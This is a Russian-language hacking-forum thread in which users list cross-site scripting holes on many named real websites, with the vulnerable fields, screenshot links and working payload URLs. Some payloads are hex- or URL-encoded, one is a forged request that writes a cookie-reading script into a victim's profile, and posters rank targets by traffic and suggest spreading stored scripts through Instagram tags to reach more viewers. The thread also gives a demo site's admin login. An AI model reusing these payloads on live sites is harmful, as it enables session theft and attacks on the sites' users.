сайт клубной музыки bananastreet.ru

ни одно поле не фильтруется в профиле

код




пример (http://www.bananastreet.ru/user/grizlikxss)

http://www.promontorio.net/index.php?id=23&page=project&pageNum_rs_list=1&sub=%22onmouseover=prompt(997378)%20bad='%3E%3Cs%D 1%81ri%D1%80t%3Ealert(/xss/)%3C/s%D1%81ri%D1%80t%3E%22

Сайт _ttp://allforchildren.ru

Уязвимое поле комментарии.

Пример (http://allforchildren.ru/kulinar/angrybirds.php)

Сайт хороший, было бы жаль если админы не примут меры.

znanija.com

Уязвимое поле "Комментарий профиля"

скриншот (http://i.zhyk.ru/?v=VuqYg.png)

www.eda-recepty.com

Фотографии->Создать новый альбом->Название

http://f3.s.qip.ru/E2nOmQWB.jpg

ogl.ru/project/users/login.php

Уязвимое поле - Email

http://imageshack.com/a/img23/5835/g0f4.png

==========================

twoystyle.ru

Регаемся, вставляя во все поля наш скрипт, далее авторизовываемся на

twoystyle.ru/login.asp, введя соответствующие данные и наблюдаем картину маслом

http://imageshack.com/a/img19/1559/uy74.png

==========================

mosgorfoto.com/users/auth.php

Уязвимое поле - Эл.почта

http://imageshack.com/a/img191/3617/ea05.png

http://s38-temporary-files.radikal.ru/b15d12816312451ab15255d6b0fd19d8/-88693455.png

В комментариях Уязвимое поле имя


http://www.f1cd.ru/soft/base/ultravpn/ultravpn_10/

http://chelreal.ru/

Яндекс Тиц 1400

Яндекс Каталог Да

уязвимость в модуле комментарий


alert('xss')

http://f5.s.qip.ru/E2nOmSw4.jpg

http://101@ru

Яндекс тИЦ 1700

Яндекс Каталог Да



Уязвимое поле login (очень удобно)

http://f6.s.qip.ru/E2nOmT2M.jpg

Чуток мотиваций

Трафик

http://f6.s.qip.ru/E2nOmT2P.jpg

http://www.isdera.de/dia_auto_cw.php?delay=10000&dia=27%22%20%3C/form%3E%20%3C/input%3E%3Ch1%3EXSS%20attack%20--GhostW%20aka%20Sepo--%3C/h1%3E

http://en.wikipedia.org/wiki/File:Isdera_imperator_1.jpg

vk.com и Википедия.

Пассивка, но все равно решил запостить.

http://s7.hostingkartinok.com/uploads/thumbs/2014/04/ba5a3b109b3c75273d5e79cdac152a08.png (http://hostingkartinok.com/show-image.php?id=ba5a3b109b3c75273d5e79cdac152a08)

В Вики аналогично, уязвим любой ресурс с возможностью загрузки и исполнения файла с форматом .svg

http://www.shoptraffic.com.ua

active XSS


GET /catalog.php?v=12&t=11&comp=Assistant HTTP/1.1
Host: www.shoptraffic.com.ua
Accept: */*
Accept-Language: en
User-Agent: Mozilla
Connection: close
Referer:
http://www.google.com/search?hl=en&q=
alert(1)

YaBtr, пассивка же. Выполняемый код передается в запросе

но алерт уже внедрен на страницу

http://shoptraffic.com.ua/catalog.php?v=12&t=11&comp=Assistant

YaBtr
, пассивка же. Выполняемый код передается в запросе


Может все-таки активная

YaBtr, и все-таки активная. Думал только с реферером работает =)

Интересный пример кстати.

filmpro.ru - социальная киносеть

Яндекс тИЦ 1100
Google Page Rank 6/10

Суточная посещаемость37Кюзеров

Редактируем профиль - Уязвимые поля "Инересы","Работа" и "Образование"

Либо

Моё фото - Создать альбом - Уязвимое поле "Название"

http://f5.s.qip.ru/E2nOmWov.jpg

Сooksa.ru - Социальная сеть для кулинаров.


Яндекс тИЦ (CY) 180 +20
Alexa Rank 163,311 -4,693
Google PageRank (PR) 4

Жмё на кнопку "Добавить рецепт" , далее запиливаем ядовитый рецепт =)

Уязвимые параметры:

Ингредиент

Примечание

Kasima.com

http://cdn.joxi.ru/uploads/prod/2014/06/19/f4a/b3d/b6d82e303c178f4f34105f8996df2ed3a3b245a2.jpg

Уязвимое поле "Статус"

alert('xss')

Уязвимое поле "Имя"

Работает в сообщениях

http://cdn.joxi.ru/uploads/prod/2014/06/19/381/5a5/f5b318d44e6bd2ad6f42dbc431f11c038df584aa.jpg

Активная XSS на демо портале блога http://demo.nibbleblog.com/

1. Зайти в админку : http://demo.nibbleblog.com/admin.php

логин;пароль: admin ; demo

2. Создать любую запись, в поле короткой ссылки написать: ">alert("Antichat.test");

3. Уязвимость во многих местах движка присутствует .

http://www.odnako.org/

тиц 1600

РУ трафика 100К

Создать блог

уязвимый параметр превью

http://f5.s.qip.ru/15A7EBIKD.png

russia.tv (http://russia.tv)

анктивная xss в поле имя и фамилия, при изменении их, в аккаунте.

aeterna.qip.ru

Создаем тест.

Название теста

">alert()

Вот

https://web.pechkin-mail.ru/

Форма регистрации. Вроде бы все поля =)


">alert() [code]

Была найдена случайно в поле поиске книг XSS

Прямая ссылка и XSS:

europarl.europa.eu/100books/en/list.html


">xss vuln found


joinup.ec.europa.eu/svn/

Весьма интересна)

тиц/пр:550/6

url:https://www.veeam.com/account-edit-profile.html


alert(123);

Уязвимое поле - Title, но через инпут не записать, так как валидация. XSRF тоже не провести, так как xmlhttprequest.

Так что, если сам себе - подменяем запрос. Ну, а злоумышленник может записать жертве через пассивку -


https://www.veeam.com/inj.html";a="script";$.ajax(%7Btype:"POST",url:"/change_field/",data:"val=injectedalert(document.cookie);%7Cjob_descript ion%7CR%2CSymbol%2CMax",dataType:"json",async:!1%7D);window.location="/account-edit-profile.html"

http://lookpic.com/O/i2/475/mE5qPLO7.png

Выложу несколько сайтов, может кому и пригодится. Ведь на рамблере молчат значит все равно на багу.


http://nova.rambler.ru/search?query=%3Cinput%20type%3D%22text%22%20value% 3D%60%60%20%3Cdiv%2Fonmouseover%3D%27alert%281%29% 27%3EX%3C%2Fdiv%3E&filter=%3Cinput%20value=%3C%3E%3Ciframe/src=javascript:confirm%281%29%3E



http://www.rfbr.ru/rffi/ru/search/?query=%C6%F3%F0%3Cinput+type%3D%22text%22+value%3 D%60%60+%3Cdiv%2Fonmouseover%3D%27alert%281%29%27% 3EX%3C%2Fdiv%3E%E1%E8%ED%E0



http://www.muztorg.ru/search/?query=%3Cinput+type%3D%22text%22+value%3D%60%60+% 3Cdiv%2Fonmouseover%3D%27alert%281%29%27%3EX%3C%2F div%3E



http://www.mcx.ru/fts/search?query=%3Cinput+type%3D%22text%22+value%3D%6 0%60+%3Cdiv%2Fonmouseover%3D%27alert%281%29%27%3EX %3C%2Fdiv%3E

Также есть и на bing.com/translate но кто скажет эта уязвимость или фича движка??? тот ее и заберет.

http://s019.radikal.ru/i617/1601/4f/b4739a8ced0e.jpg

↑ (https://antichat.live/posts/3940116/)
Также есть и на bing.com/translate но кто скажет эта уязвимость или фича движка??? тот ее и заберет.
http://s019.radikal.ru/i617/1601/4f/b4739a8ced0e.jpg


это песочница, там нет пользовательских данных

http://www.cy-pr.com/tools/metatags/

Уязвимы все поля формы.

http://s8.hostingkartinok.com/uploads/thumbs/2016/02/8539dffb5642c6c0a56fcc4dbf7df760.png (http://hostingkartinok.com/show-image.php?id=8539dffb5642c6c0a56fcc4dbf7df760)

Сто пудов уже было, ну а так для тех кто не в курсе, может сгодится!

Если в instagram'e вместо имени, в инфе о себе или в коментариях вставить наш скрипт, то на многих сторонних ресурсах, что предоставляют доступ к контенту instagram.com, в браузере он автоматически отработает! Яркий пример тому iconosquare.com, срабатывание во время скролла после поисковой выдачи они недавно "пофиксили", жаль, но если перейти на понравившееся фото или на профиль, то всё отработает, как надо!

Пруф! (http://iconosquare.com/_._.no._._._.name._._) - фото в профиле, тоже с добавкой! )

http://higgs.rghost.ru/private/6zhllHPk6/5669c635c2b9fdf997aa70d104f5e0c2/image.png

И чем больше популярных тегов рядом с нашим скриптом, тем чаще его будет выдавать сёрч , тем, соответствено, больше срабатываний!

На самом деле таких ресурсов много!

http://101.ru/

Заходим в Мой профайл в поле 'ИМЯ' ставим ">alert("123") сохраняем

Заходим в Мое промо http://101.ru/?an=my_promo

http://s8.hostingkartinok.com/uploads/thumbs/2016/04/523648de5c9c7b60629dbf5d88159629.png (http://hostingkartinok.com/show-image.php?id=523648de5c9c7b60629dbf5d88159629)

Знаю что отраженные, но все же

hi-news.ru:

тиц 2400


http://hi-news.ru/?s=\\x3c\\x2f\\x74\\x69\\x74\\x6c\\x65\\x3e\\x3c\\ x73\\x63\\x72\\x69\\x70\\x74\\x3e\\x61\\x6c\\x65\\ x72\\x74\\x28\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\ x74\\x2e\\x64\\x6f\\x6d\\x61\\x69\\x6e\\x29\\x3c\\ x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e

appleinsider.ru:

тиц 1500


http://appleinsider.ru?s=\\x3c\\x2f\\x74\\x69\\x74\\x6c\\ x65\\x3e\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3e\\ x61\\x6c\\x65\\x72\\x74\\x28\\x64\\x6f\\x63\\x75\\ x6d\\x65\\x6e\\x74\\x2e\\x64\\x6f\\x6d\\x61\\x69\\ x6e\\x29\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\ x3e

androidinsider.ru:

тиц 500


http://androidinsider.ru/?s=\\x3c\\x2f\\x74\\x69\\x74\\x6c\\x65\\x3e\\x3c\\ x73\\x63\\x72\\x69\\x70\\x74\\x3e\\x61\\x6c\\x65\\ x72\\x74\\x28\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\ x74\\x2e\\x64\\x6f\\x6d\\x61\\x69\\x6e\\x29\\x3c\\ x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e

blog.rebz.net


http://blog.rebz.net/?s=\\x3c\\x2f\\x74\\x69\\x74\\x6c\\x65\\x3e\\x3c\\ x73\\x63\\x72\\x69\\x70\\x74\\x3e\\x61\\x6c\\x65\\ x72\\x74\\x28\\x27\\x52\\x65\\x62\\x7a\\x20\\x70\\ x72\\x6f\\x73\\x74\\x69\\x27\\x29\\x3c\\x2f\\x73\\ x63\\x72\\x69\\x70\\x74\\x3e